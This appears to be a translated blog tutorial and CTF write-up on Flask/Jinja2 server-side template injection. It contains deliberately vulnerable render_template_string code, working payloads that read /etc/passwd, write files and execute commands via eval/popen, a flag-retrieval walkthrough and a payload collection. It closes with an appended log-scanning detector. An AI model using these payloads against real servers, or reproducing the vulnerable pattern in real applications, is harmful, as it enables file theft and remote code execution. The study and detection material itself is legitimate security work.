Flask template injection
2022-07-19 02:36:00 【jjj34】
Reference link
Learning flask template injection from scratch - FreeBuf (network security industry portal)
Catalog
The incorrect code is as follows
2. SSTI file read / command execution
1. First, determine whether template injection exists
2. Explore the available methods
1. Find <type 'file'>, prepare for file reading
2. Keep looking for <class 'site._Printer'>, prepare for command execution
Flask basics
Let's look at a piece of Python code first:

    from flask import Flask

    app = Flask(__name__)

    @app.route('/index/')
    def hello_world():
        return 'hello world'

1. route:
route is a decorator; its job is to bind a function to a URL.
In the sample code, when 127.0.0.1/index/ is accessed, Flask returns hello world.
2. Rendering methods
Flask has two rendering methods.
1. render_template
render_template() renders a specified file, for example:

    return render_template('index.html')

2. render_template_string
render_template_string renders a string, for example:

    html = '<h1> This is index page </h1>'
    return render_template_string(html)

3. Use of templates
Flask uses Jinja2 as its rendering engine.
Usage: create a templates folder in the root directory of the website to hold the HTML files, i.e. the template files.
test.py

    from flask import Flask, url_for, redirect, render_template, render_template_string

    app = Flask(__name__)

    @app.route('/index/')
    def user_login():
        # pass the value that the template prints in {{content}}
        return render_template('index.html', content='This is index page')

/templates/index.html

    <h1>{{content}}</h1>

This page still outputs This is index page.
{{ }} is the variable delimiter in Jinja2.
Template injection
Reason: incorrect use of Flask's render_template_string method leads to SSTI.
1. XSS injection
The incorrect code is as follows:

    from flask import request

    @app.route('/test/')
    def test():
        code = request.args.get('id')
        # user input is spliced into the template source itself
        html = '''
        <h3>%s</h3>
        ''' % (code)
        return render_template_string(html)

Why this is wrong: code is user controlled. Through ?id= the user controls code, which in turn changes the <h3>%s</h3> markup and leads to injection.
When code is </h3> <script>alert(1)</script> <h3>, the executed code becomes

    <h3> </h3> <script>alert(1)</script> <h3></h3>

causing reflected XSS.
Fix

    @app.route('/test/')
    def test():
        code = request.args.get('id')
        return render_template_string('<h1>{{ code }}</h1>', code=code)

Here code is passed to the template as a variable and rendered as a string (escaped text) instead of being spliced into the template source, so the problem above does not occur: the original text is output as-is instead of being executed as JavaScript.

2. SSTI file read / command execution
Basic knowledge
In the Jinja2 template engine, {{ }} is the variable delimiter. {{ }} can not only pass variables but also evaluate simple expressions. For example, with this code:

    @app.route('/test/')
    def test():
        code = request.args.get('id')
        html = '''
        <h3>%s</h3>
        ''' % (code)
        return render_template_string(html)

when the user enters ?id={{2*4}}, the page renders the result of the expression, 8, instead of the literal text:

File read
Use template index 40, <type 'file'> (this class only exists in Python 2); the payload is as follows:

    #1. Get the class object of the string
    {{''.__class__}}
    #2. Find the base class
    {{''.__class__.__mro__}}
    #3. Look for referenceable classes
    {{''.__class__.__mro__[2].__subclasses__()}}
    # Class that can be referenced
    #{{''.__class__.__mro__[2].__subclasses__()[40]}} -> <type 'file'>
    # Usage
    {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

Command execution
The template used is index 71, <class 'site._Printer'>; the payload is as follows:

    {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

listdir is a function in os; its argument is the path whose entries are listed.
Example
Web_python_template_injection from the attack-and-defense world (XCTF)
Link: challenge (xctf.org.cn)
Idea: find the parent class <type 'object'> -> find its subclasses -> find modules related to command execution or file operations.
Solution:
1. First, determine whether template injection exists

Obviously the payload {{2*4}} was evaluated.
2. Explore the available methods
The payload is as follows:

    {{''.__class__.__mro__[2].__subclasses__()}}

1. Find <type 'file'> and prepare for file reading

As pictured, <type 'file'> is available, at index 40.
Note: the index is the position in the list, counted from the first element, which is 0.
2. Keep looking for <class 'site._Printer'> and prepare for command execution

<class 'site._Printer'> also exists, at index 71.
3. Obtain the flag
First find the location of the flag:

    {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

Read the fl4g file:

    {{''.__class__.__mro__[2].__subclasses__()[40]('./fl4g').read()}}

Addendum
Payload collection

    // Get the base class
    ''.__class__.__mro__[1]
    {}.__class__.__bases__[0]
    ().__class__.__bases__[0]
    [].__class__.__bases__[0]
    object
    // Reading files
    ().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
    object.__subclasses__()[40](r'C:\1.php').read()
    // Writing files
    ().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
    object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')
    // Executing arbitrary commands
    ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
    object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )

Several magic attributes
__class__ returns the type (class) that the object belongs to
__mro__ returns a tuple containing the base classes the object inherits from; method resolution follows the order of the tuple.
__base__ returns the base class the object inherits from // __base__ and __mro__ are both used to find base classes
__subclasses__ every new class keeps references to its subclasses; this method returns a list of the references that are still alive
__init__ the class initialization method
__globals__ a reference to the dictionary containing the function's global variables
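A detection-side complement to the payloads listed above, added here as an example and not part of the original article: the script scans access-log lines for the Jinja2 delimiters and for the attribute names from the payload collection, and grades each request as a probe ({{2*4}} alone) or an exploit attempt (an attribute chain inside the delimiters). The log lines, IP address and combined log format are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Jinja2 variable and statement delimiters, the markers every payload above uses.
DELIMITER_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Attribute names from the payload collection: each chain in the article walks
# from a literal to object and its subclasses through these names.
DUNDER_CHAIN = ("__class__", "__mro__", "__base__", "__bases__",
                "__subclasses__", "__init__", "__globals__", "func_globals")

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target in combined log format

def inspect_query(url):
    """Classify one request URL: severity is "none", "probe" (delimiters only,
    e.g. {{2*4}}) or "exploit" (delimiters plus a DUNDER_CHAIN attribute)."""
    blocks, dunders = [], set()
    # parse_qsl percent-decodes values, so %7B%7B is matched as {{.
    for param, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for block in DELIMITER_RE.findall(value):
            blocks.append((param, block))
            dunders.update(d for d in DUNDER_CHAIN if d in block)
    if not blocks:
        severity = "none"
    elif dunders:
        severity = "exploit"
    else:
        severity = "probe"
    return {"blocks": blocks, "dunders": sorted(dunders), "severity": severity}

def scan_log(text):
    """Return (url, severity, dunders) for each log line carrying template syntax."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            result = inspect_query(match.group(1))
            if result["severity"] != "none":
                findings.append((match.group(1), result["severity"], result["dunders"]))
    return findings

# Constructed sample log lines (not from the article): a benign request, the
# {{2*4}} probe and the /etc/passwd file-read payload, all URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jul/2022:02:36:00 +0000] "GET /test/?id=hello HTTP/1.1" 200 52
10.0.0.5 - - [19/Jul/2022:02:36:07 +0000] "GET /test/?id=%7B%7B2*4%7D%7D HTTP/1.1" 200 48
10.0.0.5 - - [19/Jul/2022:02:36:19 +0000] "GET /test/?id=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%5B40%5D%28%27%2Fetc%2Fpasswd%27%29.read%28%29%7D%7D HTTP/1.1" 200 1870
"""

if __name__ == "__main__":
    for url, severity, dunders in scan_log(SAMPLE_LOG):
        print(severity, url, dunders)
```

Running the block prints one line per suspicious request; the benign request is not reported, and the file-read payload is graded above the bare arithmetic probe because of the attribute chain it carries.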